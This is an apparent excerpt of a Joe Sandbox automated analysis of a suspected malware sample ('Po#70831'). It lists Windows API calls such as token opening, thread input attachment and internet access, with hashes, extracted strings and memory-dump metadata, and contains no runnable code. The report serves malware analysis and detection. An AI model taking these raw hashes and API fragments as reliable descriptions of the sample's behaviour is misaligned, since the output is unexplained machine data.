                                      • Instruction Fuzzy Hash: 12012D32100148BBDF116E96CC42DEB7B69EF98759F04401AFE4856122C73AE961DBB4
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004913C6,00000000,00000000,?,004C301A,004913C6,00000000,00000000,00000000,?,004C328B,00000006,FlsSetValue), ref: 004C30A5
                                      • GetLastError.KERNEL32(?,004C301A,004913C6,00000000,00000000,00000000,?,004C328B,00000006,FlsSetValue,00532290,FlsSetValue,00000000,00000364,?,004C2E46), ref: 004C30B1
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004C301A,004913C6,00000000,00000000,00000000,?,004C328B,00000006,FlsSetValue,00532290,FlsSetValue,00000000), ref: 004C30BF
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: c2c48c03d991ac98fd4608bfd892a9b301c1da570e5e6479319965b323511334
                                      • Instruction ID: c90cd6104fc710b0ac006cc702eb093ac78ca4ca36a00540ef982b2d4b40cec8
                                      • Opcode Fuzzy Hash: c2c48c03d991ac98fd4608bfd892a9b301c1da570e5e6479319965b323511334
                                      • Instruction Fuzzy Hash: E401703B301622EBC7704F7AAC44F677B98AF15B72B108629F946D3240C725DD06C6E4
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 004F747F
                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004F7497
                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004F74AC
                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 004F74CA
                                      Similarity
                                      • API ID: Type$Register$FileLoadModuleNameUser
                                      • String ID:
                                      • API String ID: 1352324309-0
                                      • Opcode ID: 6bee9fa1139b2ca5168d49ace75e3ae1b2fe95209372279b1a74aa167be82e73
                                      • Instruction ID: c9d7f4a558e8afd04021f8c91ae85685b9cb37ea9fff90edd011932c9d30a72a
                                      • Opcode Fuzzy Hash: 6bee9fa1139b2ca5168d49ace75e3ae1b2fe95209372279b1a74aa167be82e73
                                      • Instruction Fuzzy Hash: 40118EB1205319ABE7309F14ED09BA67FFCEF00B00F10856AE616D7192D778E909DB95
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004FACD3,?,00008000), ref: 004FB0C4
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004FACD3,?,00008000), ref: 004FB0E9
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004FACD3,?,00008000), ref: 004FB0F3
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004FACD3,?,00008000), ref: 004FB126
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: 5b2b1e701833d471b195ea34bd5bc6f3ff8c95bd78893fb00da2a58a5099ac50
                                      • Instruction ID: b5ee56ba00f0828eeb1c6e71934d6235e4a7735eb2018772ff524535d952f1af
                                      • Opcode Fuzzy Hash: 5b2b1e701833d471b195ea34bd5bc6f3ff8c95bd78893fb00da2a58a5099ac50
                                      • Instruction Fuzzy Hash: 49115A30C0091CDBCF109FA4DA696FEBF78FF5A311F004086DA41B2241CB344555DB99
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004F2DC5
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 004F2DD6
                                      • GetCurrentThreadId.KERNEL32 ref: 004F2DDD
                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004F2DE4
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: bfae7bad266b2e1fdaf1bb534f51cc0bc5f751e2f3c1c47b26a8829a59b552ee
                                      • Instruction ID: d38def19d3f468a8b5bbab0e1c1fec8da705e9fdd8c452f1c4f51def171b9482
                                      • Opcode Fuzzy Hash: bfae7bad266b2e1fdaf1bb534f51cc0bc5f751e2f3c1c47b26a8829a59b552ee
                                      • Instruction Fuzzy Hash: 06E06D711016287BE7301B669C0EEFB7E6CEF63BA1F400116B205D10819AA8984AD6B0
                                      APIs
                                        • Part of subcall function 004A9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004A9693
                                        • Part of subcall function 004A9639: SelectObject.GDI32(?,00000000), ref: 004A96A2
                                        • Part of subcall function 004A9639: BeginPath.GDI32(?), ref: 004A96B9
                                        • Part of subcall function 004A9639: SelectObject.GDI32(?,00000000), ref: 004A96E2
                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00528887
                                      • LineTo.GDI32(?,?,?), ref: 00528894
                                      • EndPath.GDI32(?), ref: 005288A4
                                      • StrokePath.GDI32(?), ref: 005288B2
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      • Opcode ID: 123abff06eeb7767b8fc23ef40f25a3c5d2336f2722d73e0a06ac913cf5c313b
                                      • Instruction ID: 48b03a200594d0017a3b86d3a0a2c70cdc75e4352a6fd32a8693be77cf439a92
                                      • Opcode Fuzzy Hash: 123abff06eeb7767b8fc23ef40f25a3c5d2336f2722d73e0a06ac913cf5c313b
                                      • Instruction Fuzzy Hash: A0F05436041554F6EB225F94AC0DFDE3F596F27310F048000FA11650E2C7B55556EFE9
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 004A98CC
                                      • SetTextColor.GDI32(?,?), ref: 004A98D6
                                      • SetBkMode.GDI32(?,00000001), ref: 004A98E9
                                      • GetStockObject.GDI32(00000005), ref: 004A98F1
                                      Similarity
                                      • API ID: Color$ModeObjectStockText
                                      • String ID:
                                      • API String ID: 4037423528-0
                                      • Opcode ID: 670a5dca53e69c8c850f0cca0d098345895953437e943176e2cc60ec2cbf04cf
                                      • Instruction ID: bf78e122b587e51ae4b4bcd06ee56e9ad4ebcb80369262d608d97ff00a3ab4bd
                                      • Opcode Fuzzy Hash: 670a5dca53e69c8c850f0cca0d098345895953437e943176e2cc60ec2cbf04cf
                                      • Instruction Fuzzy Hash: C2E06531244680BADB315B75AC09BDD3F10AF23336F04821AF6F6541E2C3754655EB11
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 004F1634
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,004F11D9), ref: 004F163B
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004F11D9), ref: 004F1648
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,004F11D9), ref: 004F164F
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      • Opcode ID: b3cb229c62f015f2adcc824b7c0ff0fec747290d05ebd8a07f4fe1483bd5fde2
                                      • Instruction ID: 4fedcb9c7f5ca280a96236ee101fd36c2c8c96a3f51cdb0035467c88f5382c66
                                      • Opcode Fuzzy Hash: b3cb229c62f015f2adcc824b7c0ff0fec747290d05ebd8a07f4fe1483bd5fde2
                                      • Instruction Fuzzy Hash: B4E08631601211DBE7301FA09D0DB5F3F7CAF76791F144809F346CA091D638444AD758
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 004ED858
                                      • GetDC.USER32(00000000), ref: 004ED862
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004ED882
                                      • ReleaseDC.USER32(?), ref: 004ED8A3
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: a8dd197ad3de89f9200a4bf3e458cceaf984610108ca91fd4f79b3ef792c8315
                                      • Instruction ID: dd41dc114b918b46fadd0758f817628ea29e3d6b2f50f21ee57b734cc4379887
                                      • Opcode Fuzzy Hash: a8dd197ad3de89f9200a4bf3e458cceaf984610108ca91fd4f79b3ef792c8315
                                      • Instruction Fuzzy Hash: 0AE0E5B5C00204DFCB51AFA5980866DBFB1FF19711F10801AE806E7251C7385906AF45
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 004ED86C
                                      • GetDC.USER32(00000000), ref: 004ED876
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004ED882
                                      • ReleaseDC.USER32(?), ref: 004ED8A3
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 260a9ec7353406d20f39b2f68ed12173c632f8906cbad0999743cdc8e63f5cce
                                      • Instruction ID: 14ae9a2b61e9d9f0825450b31b43bc2f92e3e31471a646b30e40245b367f3074
                                      • Opcode Fuzzy Hash: 260a9ec7353406d20f39b2f68ed12173c632f8906cbad0999743cdc8e63f5cce
                                      • Instruction Fuzzy Hash: EDE0EEB5C00200EFCB60AFA4980866DBFB1AF29710B108009E80AE7251CB38690AAF84
                                      APIs
                                        • Part of subcall function 00497620: _wcslen.LIBCMT ref: 00497625
                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00504ED4
                                      Strings
                                      Similarity
                                      • API ID: Connection_wcslen
                                      • String ID: *$LPT
                                      • API String ID: 1725874428-3443410124
                                      • Opcode ID: c5ca85b4182606ef94738e2314ff94f5a1d9f048beb54f8ef04dc9e1b52d0d32
                                      • Instruction ID: 862dd2a9f520d6b4e630fb586be5033b0958d7ef9d492190faf7016808bd4750
                                      • Opcode Fuzzy Hash: c5ca85b4182606ef94738e2314ff94f5a1d9f048beb54f8ef04dc9e1b52d0d32
                                      • Instruction Fuzzy Hash: 7C916DB5A002059FCB14DF59C484EAEBBF5BF44308F198099E90A9B3A2D735ED85CF91
                                      APIs
                                      • CharUpperBuffW.USER32(004E569E,00000000,?,0052CC08,?,00000000,00000000), ref: 005178DD
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      • CharUpperBuffW.USER32(004E569E,00000000,?,0052CC08,00000000,?,00000000,00000000), ref: 0051783B
                                      Strings
                                      Similarity
                                      • API ID: BuffCharUpper$_wcslen
                                      • String ID: <sU
                                      • API String ID: 3544283678-3441642152
                                      • Opcode ID: 39201311c51826b0345be7ae2c4848c48fb5f33b2f31a4aa14d2f6584431ea5b
                                      • Instruction ID: 2a0989e5bf131fc8c7e14484117b798a163706f09865d7d89f34943b4740be37
                                      • Opcode Fuzzy Hash: 39201311c51826b0345be7ae2c4848c48fb5f33b2f31a4aa14d2f6584431ea5b
                                      • Instruction Fuzzy Hash: 07616D72914118AADF04EBA9CC91DFDBB78BF18708F44453AF542A3091EB385A49CBA4
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: #
                                      • API String ID: 0-1885708031
                                      • Opcode ID: 6b3c7b10a0d925cf7ea7a04cd1ee38cb67a083e788fd9c7afb27337645da828d
                                      • Instruction ID: 862b493c81fd277e023e29ff73b395920f08ac8ffc1edf24d9b192e6f21475a9
                                      • Opcode Fuzzy Hash: 6b3c7b10a0d925cf7ea7a04cd1ee38cb67a083e788fd9c7afb27337645da828d
                                      • Instruction Fuzzy Hash: A3510436500286DFDF15DF2BC4416BA7BA4EF66311F24409BECA19B390D6389D43CB59
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 004AF2A2
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 004AF2BB
                                      Strings
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: cd9fd2a60d9c70a6205634f542204968ada91970d49714345a9a186611a56cc6
                                      • Instruction ID: ef5f953456c4bc85c28f4127e1b0c309a04b46a493ea808badad10c535cf18bc
                                      • Opcode Fuzzy Hash: cd9fd2a60d9c70a6205634f542204968ada91970d49714345a9a186611a56cc6
                                      • Instruction Fuzzy Hash: 6A5188724187449BD720AF11DC86BAFBBF8FF85308F81485DF1D941099EB708529CB6A
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 005157E0
                                      • _wcslen.LIBCMT ref: 005157EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper_wcslen
                                      • String ID: CALLARGARRAY
                                      • API String ID: 157775604-1150593374
                                      • Opcode ID: c94b1df13eaaf75b92e434515274cf24ed78c56845ba82c2680d2548eb72ff37
                                      • Instruction ID: bba6d3435dfa3b1ff6352ec9e40ed64c8513e64f9cb6c362814f48dfb68d5336
                                      • Opcode Fuzzy Hash: c94b1df13eaaf75b92e434515274cf24ed78c56845ba82c2680d2548eb72ff37
                                      • Instruction Fuzzy Hash: BB417D31A00109EFDB14EFA9C8819EEBFB5FF99354F20406EE515A7291E7349D81CB94
                                      APIs
                                      • _wcslen.LIBCMT ref: 0050D130
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0050D13A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CrackInternet_wcslen
                                      • String ID: |
                                      • API String ID: 596671847-2343686810
                                      • Opcode ID: c1d8250309a43772bf9c16db00b5e0f8b52bba0c28f41f3b138f0ec43d27fa0f
                                      • Instruction ID: 65a2200652d0dfd91beaf6becc415d665969b8fa2ce86fe7395e16bcc94eed2a
                                      • Opcode Fuzzy Hash: c1d8250309a43772bf9c16db00b5e0f8b52bba0c28f41f3b138f0ec43d27fa0f
                                      • Instruction Fuzzy Hash: 37312C71D00209ABCF15EFA5CC85AEEBFB9FF04344F00002AF815A6162DB35AA16DB64
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 00523621
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0052365C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: 1e83ec2f7e966cb5d3b14b921bf7290a3d1d8b0cf16d4eeac748d4c8690c372e
                                      • Instruction ID: 6338f294998f2cee55177d91a8cd81ba9f092a69734c6b283fba9679c64de517
                                      • Opcode Fuzzy Hash: 1e83ec2f7e966cb5d3b14b921bf7290a3d1d8b0cf16d4eeac748d4c8690c372e
                                      • Instruction Fuzzy Hash: FB31AF71100614AADB20DF68EC80EBB7BA9FF99724F00861DF8A597280DA34AD81D760
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0052461F
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00524634
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      • Opcode ID: 12e95f03aedfb1e31d3fdf148e5b42eae2a728a60ed1445616cdb9741bb2555f
                                      • Instruction ID: 2dab6a5ce624938f94f1e8e846696d976a348fb745c06472ef01375d8e7233ae
                                      • Opcode Fuzzy Hash: 12e95f03aedfb1e31d3fdf148e5b42eae2a728a60ed1445616cdb9741bb2555f
                                      • Instruction Fuzzy Hash: 67313974A003199FDF14CFA9D980BEA7BB5FF0A300F14406AE905AB381D770A941DF90
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0052327C
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00523287
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 72848526659f4bc1ad5674757c4498976faccf2bacc6113200f46e8c09d36e52
                                      • Instruction ID: 79f369f2572df1589909b284878aefec88a4b765ca156afb52ea0def92683530
                                      • Opcode Fuzzy Hash: 72848526659f4bc1ad5674757c4498976faccf2bacc6113200f46e8c09d36e52
                                      • Instruction Fuzzy Hash: CF11D075300218AFEF219E94EC84EBB3F6AFF9A364F100129F918AB2D0D6359D519760
                                      APIs
                                        • Part of subcall function 0049600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0049604C
                                        • Part of subcall function 0049600E: GetStockObject.GDI32(00000011), ref: 00496060
                                        • Part of subcall function 0049600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0049606A
                                      • GetWindowRect.USER32(00000000,?), ref: 0052377A
                                      • GetSysColor.USER32(00000012), ref: 00523794
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      • Opcode ID: 4045bbb24fe07e40e6e5f6aff9df29747bc2a51f869d76227208781010361a5b
                                      • Instruction ID: 58aed0c6f51320be80fbfefb1acbbff5e9403e63599a552f1ec5815eeacb2ffd
                                      • Opcode Fuzzy Hash: 4045bbb24fe07e40e6e5f6aff9df29747bc2a51f869d76227208781010361a5b
                                      • Instruction Fuzzy Hash: D01147B261021AAFDF00DFA8DC45AEA7BB8FF09304F044914F955E2291E774E9119B50
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0050CD7D
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0050CDA6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      • Opcode ID: f0b0614b063bbf4287ab3fadaad9319ce2203f642a5b899d5e44496e308f822e
                                      • Instruction ID: c34bd4b6cc1859d647020a3ee679e5b738d2a8509f2e5d40b62963bbc7f8c145
                                      • Opcode Fuzzy Hash: f0b0614b063bbf4287ab3fadaad9319ce2203f642a5b899d5e44496e308f822e
                                      • Instruction Fuzzy Hash: AC11A3722156717AD7344B668C85EEBBE6CFF137A4F00472AB109831C0D6609845D6F0
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 005234AB
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005234BA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: edbb2d8445169ecb3f5920711e62cd4653c90184483e62dbcfcca7aa09b6bdb0
                                      • Instruction ID: 58d7fa2b75a558e6869f46c0ec3e933d4a7bdd63679c4bc5d767cd7b6dfeea82
                                      • Opcode Fuzzy Hash: edbb2d8445169ecb3f5920711e62cd4653c90184483e62dbcfcca7aa09b6bdb0
                                      • Instruction Fuzzy Hash: B811B271100118ABEF115E64EC48ABB3F69FF16374F504764F960971D0C779EC519B90
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • CharUpperBuffW.USER32(?,?,?), ref: 004F6CB6
                                      • _wcslen.LIBCMT ref: 004F6CC2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharUpper
                                      • String ID: STOP
                                      • API String ID: 1256254125-2411985666
                                      • Opcode ID: 0ec5a384261ab6282d3c356e5ce2fa253769861a78867a17ac7aa6376f663379
                                      • Instruction ID: 6073c1f68e2234b35ddcea74105d074aaa873b077f4aeff7b41736119d4864e3
                                      • Opcode Fuzzy Hash: 0ec5a384261ab6282d3c356e5ce2fa253769861a78867a17ac7aa6376f663379
                                      • Instruction Fuzzy Hash: D6012B3261052A8BCB209FBDDC408BF37B4FF61714702053FE96293295EB39D800C654
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                        • Part of subcall function 004F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004F3CCA
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 004F1C46
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
